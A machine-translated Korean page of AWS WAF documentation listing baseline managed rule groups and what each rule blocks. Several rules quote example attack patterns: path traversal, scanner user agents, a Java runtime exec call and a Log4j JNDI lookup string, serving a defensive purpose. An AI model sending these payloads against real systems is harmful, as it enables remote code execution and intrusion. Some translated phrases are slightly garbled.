**에 대한 새로운 콘솔 환경 소개 AWS WAF**
이제 업데이트된 환경을 사용하여 콘솔의 모든 위치에서 AWS WAF 기능에 액세스할 수 있습니다. 자세한 내용은 [콘솔 작업을 참조하세요](https://docs.aws.amazon.com/waf/latest/developerguide/working-with-console.html).
기계 번역으로 제공되는 번역입니다. 제공된 번역과 원본 영어의 내용이 상충하는 경우에는 영어 버전이 우선합니다.
# 기준 규칙 그룹
기준 관리형 규칙 그룹은 다양한 일반적인 위협에 대한 일반적인 보호 기능을 제공합니다. 이러한 규칙 그룹 중 하나 이상을 선택하여 리소스에 대한 기준 보호를 설정합니다.
## 핵심 규칙 세트(CRS) 관리형 규칙 그룹
VendorName: `AWS`, Name: `AWSManagedRulesCommonRuleSet`, WCU: 700
**참고**
이 설명서에서는이 관리형 규칙 그룹의 최신 정적 버전 릴리스를 다룹니다. 버전 변경을 [AWS 관리형 규칙 변경 로그](aws-managed-rule-groups-changelog.md)의 변경 로그에 보고합니다. 다른 버전에 대한 자세한 정보를 보려면 [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html)의 API 명령을 사용하세요.
AWS 관리형 규칙 규칙 그룹의 규칙에 대해 게시하는 정보는 악의적인 행위자에게 규칙을 우회하는 데 필요한 사항을 제공하지 않고 규칙을 사용하는 데 필요한 사항을 제공하기 위한 것입니다.
여기서 찾을 수 있는 내용보다 더 많은 정보가 필요한 경우 [AWS Support 센터](https://console.aws.amazon.com/support/home#/)에 문의하세요.
핵심 규칙 집합(CRS, Core rule set) 규칙 그룹에는 일반적으로 웹 애플리케이션에 적용할 수 있는 규칙이 포함되어 있습니다. 이를 통해 [OWASP Top 10](https://owasp.org/www-project-top-ten/)과 같은 OWASP 게시물에 설명된 자주 발생하고 위험성 높은 일부 취약성을 비롯한 광범위한 취약성 도용을 막을 수 있습니다. AWS WAF 모든 사용 사례에이 규칙 그룹을 사용하는 것이 좋습니다.
이 관리형 규칙 그룹은 평가하는 웹 요청에 레이블을 추가하는데, 이 레이블은 보호 팩(웹 ACL)에서 이 규칙 그룹 이후에 실행되는 규칙에 사용할 수 있습니다. AWS WAF 는 Amazon CloudWatch 지표에도 레이블을 기록합니다. 레이블 및 레이블 지표에 대한 일반적인 내용은 [웹 요청 레이블 지정](waf-labels.md) 및 [레이블 지표 및 차원](waf-metrics.md#waf-metrics-label) 섹션을 참조하세요.
| 규칙 이름 | 설명 및 레이블 |
| --- | --- |
| NoUserAgent\_HEADER | HTTP `User-Agent` 헤더가 누락된 요청을 검사합니다.
규칙 작업: Block
레이블: `awswaf:managed:aws:core-rule-set:NoUserAgent_Header` |
| UserAgent\_BadBots\_HEADER | 요청이 불량 봇임을 나타내는 공통 `User-Agent` 헤더 값이 있는지 검사합니다. 예제 패턴에는 `nessus` 및 `nmap`이 포함되어 있습니다. 봇 관리에 대한 자세한 내용은 [AWS WAF Bot Control 규칙 그룹](aws-managed-rule-groups-bot.md) 섹션을 참조하세요.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:BadBots_Header` |
| SizeRestrictions\_QUERYSTRING | URI 쿼리 문자열이 2,048바이트를 초과하는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString` |
| SizeRestrictions\_Cookie\_HEADER | 쿠키 헤더가 10,240바이트를 초과하늕 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header` |
| SizeRestrictions\_BODY | 요청 본문이 8KB(8,192바이트)를 초과하는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:SizeRestrictions_Body` |
| SizeRestrictions\_URIPATH | URI 경로가 1,024바이트를 초과하는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath` |
| EC2MetaDataSSRF\_BODY | 요청 본문에서 Amazon EC2 메타데이터를 빼내려는 시도가 있는지 검사합니다.이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body` |
| EC2MetaDataSSRF\_COOKIE | 요청 쿠키에서 Amazon EC2 메타데이터를 빼내려는 시도가 있는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie` |
| EC2MetaDataSSRF\_URIPATH | 요청 URI 경로에서 Amazon EC2 메타데이터를 빼내려는 시도가 있는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath` |
| EC2MetaDataSSRF\_QUERYARGUMENTS | 요청 쿼리 인수에서 Amazon EC2 메타데이터를 빼내려는 시도가 있는지 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments` |
| GenericLFI\_QUERYARGUMENTS | 쿼리 인수에 로컬 파일 포함(LFI) 도용이 있는지 검사합니다. 예를 들면 `../../` 같은 기술을 사용한 경로 탐색 시도가 있을 수 있습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments` |
| GenericLFI\_URIPATH | URI 경로에 로컬 파일 포함(LFI) 도용이 있는지 검사합니다. 예를 들면 `../../` 같은 기술을 사용한 경로 탐색 시도가 있을 수 있습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericLFI_URIPath` |
| GenericLFI\_BODY | 요청 본문에 로컬 파일 포함(LFI) 도용이 있는지 검사합니다. 예를 들면 `../../` 같은 기술을 사용한 경로 탐색 시도가 있을 수 있습니다.이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericLFI_Body` |
| RestrictedExtensions\_URIPATH | URI 경로에 읽거나 실행하기에 안전하지 않은 시스템 파일 확장자가 포함된 요청이 있는지 검사합니다. 예제 패턴에는 `.log` 및 `.ini` 같은 확장명이 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath` |
| RestrictedExtensions\_QUERYARGUMENTS | 쿼리 인수가 클라이언트가 읽거나 실행하기에 안전하지 않은 시스템 파일 확장명인 요청을 검사합니다. 예제 패턴에는 `.log` 및 `.ini` 같은 확장명이 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments` |
| GenericRFI\_QUERYARGUMENTS | 모든 쿼리 매개 변수의 값을 검사하여 IPv4 주소가 포함된 URL을 포함하여 웹 애플리케이션에서 RFI(Remote File Inclusion)를 악용하려는 시도가 있는지 확인합니다. 예를 들면, 악용 시도에는 IPv4 호스트 헤더가 있는 `http://`, `https://`,`ftp://`,`ftps://` 및 `file://` 등의 패턴이 있습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments` |
| GenericRFI\_BODY | IPv4 주소가 포함된 URL을 포함하여 웹 애플리케이션에서 RFI(Remote File Inclusion)를 악용하려는 시도가 있는지 알아보기 위해 요청 본문을 검사합니다. 예를 들면, 악용 시도에는 IPv4 호스트 헤더가 있는 `http://`, `https://`,`ftp://`,`ftps://` 및 `file://` 등의 패턴이 있습니다.이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericRFI_Body` |
| GenericRFI\_URIPATH | IPv4 주소가 포함된 URL을 포함하여 웹 애플리케이션에서 RFI(Remote File Inclusion)를 악용하려는 시도가 있는지 알아보기 위해 URI 경로를 검사합니다. 예를 들면, 악용 시도에는 IPv4 호스트 헤더가 있는 `http://`, `https://`,`ftp://`,`ftps://` 및 `file://` 등의 패턴이 있습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:GenericRFI_URIPath` |
| CrossSiteScripting\_COOKIE | 내장된를 사용하여 쿠키 헤더의 값에 일반적인 교차 사이트 스크립팅(XSS) 패턴이 있는지 검사합니다 AWS WAF [교차 사이트 스크립팅 공격 규칙 문](waf-rule-statement-type-xss-match.md). 예제 패턴에는 `` 같은 스크립트가 포함됩니다. AWS WAF 로그의 규칙 일치 세부 정보는이 규칙 그룹의 버전 2.0에 대해 채워지지 않습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie` |
| CrossSiteScripting\_QUERYARGUMENTS | 내장된를 사용하여 쿼리 인수의 값에 일반적인 교차 사이트 스크립팅(XSS) 패턴이 있는지 검사합니다 AWS WAF [교차 사이트 스크립팅 공격 규칙 문](waf-rule-statement-type-xss-match.md). 예제 패턴에는 `` 같은 스크립트가 포함됩니다. AWS WAF 로그의 규칙 일치 세부 정보는이 규칙 그룹의 버전 2.0에 대해 채워지지 않습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments` |
| CrossSiteScripting\_BODY | 기본 제공를 사용하여 요청 본문에 일반적인 교차 사이트 스크립팅(XSS) 패턴이 있는지 검사합니다 AWS WAF [교차 사이트 스크립팅 공격 규칙 문](waf-rule-statement-type-xss-match.md). 예제 패턴에는 `` 같은 스크립트가 포함됩니다. AWS WAF 로그의 규칙 일치 세부 정보는이 규칙 그룹의 버전 2.0에 대해 채워지지 않습니다. 이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body` |
| CrossSiteScripting\_URIPATH | 기본 제공를 사용하여 URI 경로의 값에 일반적인 교차 사이트 스크립팅(XSS) 패턴이 있는지 검사합니다 AWS WAF [교차 사이트 스크립팅 공격 규칙 문](waf-rule-statement-type-xss-match.md). 예제 패턴에는 `` 같은 스크립트가 포함됩니다. AWS WAF 로그의 규칙 일치 세부 정보는이 규칙 그룹의 버전 2.0에 대해 채워지지 않습니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath` |
## 관리 보호 관리형 규칙 그룹
VendorName: `AWS`, Name: `AWSManagedRulesAdminProtectionRuleSet`, WCU: 100
**참고**
이 설명서에서는이 관리형 규칙 그룹의 최신 정적 버전 릴리스를 다룹니다. 버전 변경을 [AWS 관리형 규칙 변경 로그](aws-managed-rule-groups-changelog.md)의 변경 로그에 보고합니다. 다른 버전에 대한 자세한 정보를 보려면 [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html)의 API 명령을 사용하세요.
AWS 관리형 규칙 규칙 그룹의 규칙에 대해 게시하는 정보는 악의적인 행위자에게 규칙을 우회하는 데 필요한 사항을 제공하지 않고 규칙을 사용하는 데 필요한 사항을 제공하기 위한 것입니다.
여기서 찾을 수 있는 내용보다 더 많은 정보가 필요한 경우 [AWS Support 센터](https://console.aws.amazon.com/support/home#/)에 문의하세요.
관리 보호 규칙 그룹에는 노출된 관리 페이지에 대한 외부 액세스를 차단할 수 있는 규칙이 포함되어 있습니다. 서드 파티 소프트웨어를 실행 중이거나, 악성 액터가 애플리케이션에 대한 관리 액세스 권한을 얻게 되는 위험을 줄이려면 이 방법이 유용할 수 있습니다.
이 관리형 규칙 그룹은 평가하는 웹 요청에 레이블을 추가하는데, 이 레이블은 보호 팩(웹 ACL)에서 이 규칙 그룹 이후에 실행되는 규칙에 사용할 수 있습니다. AWS WAF 는 Amazon CloudWatch 지표에도 레이블을 기록합니다. 레이블 및 레이블 지표에 대한 일반적인 내용은 [웹 요청 레이블 지정](waf-labels.md) 및 [레이블 지표 및 차원](waf-metrics.md#waf-metrics-label) 섹션을 참조하세요.
| 규칙 이름 | 설명 및 레이블 |
| --- | --- |
| AdminProtection\_URIPATH | 일반적으로 웹 서버 또는 애플리케이션의 관리를 위해 예약되어 있는 URI 경로가 있는지 검사합니다. 예제 패턴에는 `sqlmanager` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:admin-protection:AdminProtection_URIPath` |
## 관리형 규칙 그룹의 알려진 잘못된 입력
VendorName: `AWS`, Name: `AWSManagedRulesKnownBadInputsRuleSet`, WCU: 200
**참고**
이 설명서에서는이 관리형 규칙 그룹의 최신 정적 버전 릴리스를 다룹니다. 버전 변경을 [AWS 관리형 규칙 변경 로그](aws-managed-rule-groups-changelog.md)의 변경 로그에 보고합니다. 다른 버전에 대한 자세한 정보를 보려면 [DescribeManagedRuleGroup](https://docs.aws.amazon.com/waf/latest/APIReference/API_DescribeManagedRuleGroup.html)의 API 명령을 사용하세요.
AWS 관리형 규칙 규칙 그룹의 규칙에 대해 게시하는 정보는 악의적인 행위자에게 규칙을 우회하는 데 필요한 사항을 제공하지 않고 규칙을 사용하는 데 필요한 사항을 제공하기 위한 것입니다.
여기서 찾을 수 있는 내용보다 더 많은 정보가 필요한 경우 [AWS Support 센터](https://console.aws.amazon.com/support/home#/)에 문의하세요.
알려진 잘못된 입력 규칙 그룹에는 유효하지 않은 것으로 알려져 있으며 취약성의 도용 또는 발견과 관련된 요청 패턴을 차단하는 규칙이 포함되어 있습니다. 이렇게 하면 악성 액터가 취약한 애플리케이션을 발견하는 위험을 줄일 수 있습니다.
이 관리형 규칙 그룹은 평가하는 웹 요청에 레이블을 추가하는데, 이 레이블은 보호 팩(웹 ACL)에서 이 규칙 그룹 이후에 실행되는 규칙에 사용할 수 있습니다. AWS WAF 는 Amazon CloudWatch 지표에도 레이블을 기록합니다. 레이블 및 레이블 지표에 대한 일반적인 내용은 [웹 요청 레이블 지정](waf-labels.md) 및 [레이블 지표 및 차원](waf-metrics.md#waf-metrics-label) 섹션을 참조하세요.
| 규칙 이름 | 설명 및 레이블 |
| --- | --- |
| JavaDeserializationRCE\_HEADER | Spring Core and Cloud Function RCE 취약점(CVE-2022-22963, CVE-2022-22965)과 같은 Java 역직렬화 원격 명령 실행(RCE) 시도를 나타내는 패턴이 있는지 HTTP 요청 헤더의 키와 값을 검사합니다. 예제 패턴에는 `(java.lang.Runtime).getRuntime().exec("whoami")` 코드가 포함됩니다.이 규칙은 요청 헤더의 처음 8KB 또는 처음 200개 헤더(둘 중 먼저 도달하는 제한)만 검사하며 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header` |
| JavaDeserializationRCE\_BODY | Spring Core and Cloud Function RCE 취약성(CVE-2022-22963, CVE-2022-22965)과 같은 Java 역직렬화 원격 명령 실행(RCE) 시도를 나타내는 패턴이 있는지 요청 본문을 검사합니다. 예제 패턴에는 `(java.lang.Runtime).getRuntime().exec("whoami")` 코드가 포함됩니다.이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body` |
| JavaDeserializationRCE\_URIPATH | Spring Core and Cloud Function RCE 취약성(CVE-2022-22963, CVE-2022-22965)과 같은 Java 역직렬화 원격 명령 실행(RCE) 시도를 나타내는 패턴이 있는지 요청 URI를 검사합니다. 예제 패턴에는 `(java.lang.Runtime).getRuntime().exec("whoami")` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath` |
| JavaDeserializationRCE\_QUERYSTRING | Spring Core and Cloud Function RCE 취약성(CVE-2022-22963, CVE-2022-22965)과 같은 Java 역직렬화 원격 명령 실행(RCE) 시도를 나타내는 패턴이 있는지 요청 쿼리 문자열을 검사합니다. 예제 패턴에는 `(java.lang.Runtime).getRuntime().exec("whoami")` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString` |
| Host\_localhost\_HEADER | 로컬 호스트를 나타내는 패턴에 대한 요청의 호스트 헤더를 검사합니다. 예제 패턴에는 `localhost` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header` |
| PROPFIND\_METHOD | `HEAD`와 유사하지만 XML 객체를 빼내려는 의도가 추가된 `PROPFIND`에 대한 요청의 HTTP 메서드를 검사합니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Propfind_Method` |
| ExploitablePaths\_URIPATH | URI 경로에서 도용 가능한 웹 애플리케이션 경로에 대한 액세스 시도를 검사합니다. 예제 패턴에는 `web-inf`와 같은 경로가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath` |
| Log4JRCE\_HEADER | 요청 헤더의 키와 값을 검사하여 Log4j 취약점([CVE-2021-44228](https://www.cve.org/CVERecord?id=CVE-2021-44228), [CVE-2021-45046](https://www.cve.org/CVERecord?id=CVE-2021-45046), [CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45105))이 있는지 확인하고 원격 코드 실행(RCE) 시도로부터 보호합니다. 예제 패턴에는 `${jndi:ldap://example.com/}` 코드가 포함됩니다.이 규칙은 요청 헤더의 처음 8KB 또는 처음 200개 헤더(둘 중 먼저 도달하는 제한)만 검사하며 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header` |
| Log4JRCE\_QUERYSTRING | 쿼리 문자열을 검사하여 Log4j 취약성([CVE-2021-44228](https://www.cve.org/CVERecord?id=CVE-2021-44228), [CVE-2021-45046](https://www.cve.org/CVERecord?id=CVE-2021-45046), [CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45105))이 있는지 확인하고 원격 코드 실행(RCE) 시도로부터 보호합니다. 예제 패턴에는 `${jndi:ldap://example.com/}` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString` |
| Log4JRCE\_BODY | 본문을 검사하여 Log4j 취약성([CVE-2021-44228](https://www.cve.org/CVERecord?id=CVE-2021-44228), [CVE-2021-45046](https://www.cve.org/CVERecord?id=CVE-2021-45046), [CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45105))이 있는지 확인하고 원격 코드 실행(RCE) 시도로부터 보호합니다. 예제 패턴에는 `${jndi:ldap://example.com/}` 코드가 포함됩니다.이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `Continue` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body` |
| Log4JRCE\_URIPATH | URI 경로를 검사하여 Log4j 취약성([CVE-2021-44228](https://www.cve.org/CVERecord?id=CVE-2021-44228), [CVE-2021-45046](https://www.cve.org/CVERecord?id=CVE-2021-45046), [CVE-2021-45105](https://www.cve.org/CVERecord?id=CVE-2021-45105))이 있는지 확인하고 원격 코드 실행(RCE) 시도로부터 보호합니다. 예제 패턴에는 `${jndi:ldap://example.com/}` 코드가 포함됩니다.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath` |
| ReactJSRCE\_BODY | 요청 본문에 CVE-2025-55182의 존재를 나타내는 패턴이 있는지 검사합니다. 이 규칙은 요청 본문을 보호 팩(웹 ACL)과 리소스 유형의 본문 크기 제한까지만 검사합니다. Application Load Balancer 및 AWS AppSync의 경우 제한은 8KB로 고정됩니다. CloudFront, API Gateway, Amazon Cognito, App Runner 및 AWS Verified Access의 경우 기본 제한은 16KB이며 보호 팩(웹 ACL) 구성에서 제한을 최대 64KB까지 늘릴 수 있습니다. 이 규칙은 과대 콘텐츠 처리에 대해 `CONTINUE` 옵션을 사용합니다. 자세한 내용은 [에서 웹 요청 구성 요소 크기 초과 AWS WAF](waf-oversize-request-components.md) 단원을 참조하십시오.
규칙 작업: Block
Label(레이블): `awswaf:managed:aws:known-bad-inputs:ReactJSRCE_Body` |